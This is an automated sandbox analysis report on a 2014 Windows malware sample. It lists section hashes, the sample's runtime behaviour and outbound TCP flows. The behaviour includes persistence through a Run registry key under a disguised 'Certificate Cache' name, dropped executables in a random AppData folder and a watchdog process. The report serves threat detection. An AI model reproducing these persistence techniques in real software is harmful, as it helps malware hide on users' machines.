Analysis Date: 2014-09-19 04:01:39

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 1f3a25753457b3202ae0953a66f1b408 sha1: 58bcaf6aa7ea91f225819a4066423c4144400f01 size: 293888
Section .rdata md5: 788eb9230abe8ff7b79386293e0d66e8 sha1: 7c7fd39d34ed2fcdc762bdfb631f0d4d1555044c size: 34816
Section md5: 1dbd447eeb1a697e54d2d06e9f2b4fa1 sha1: 8bc3e9f8a992fa2af42860aa7e0a7f9841e70dac size: 95744
Timestamp: 2014-07-24 04:49:47
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Shell System Layer Certificate Cache ➝
C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe

↳ C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.l8bi
Creates File: C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\upqmhdgg.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe"

Network Details:
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝

Raw Pcap

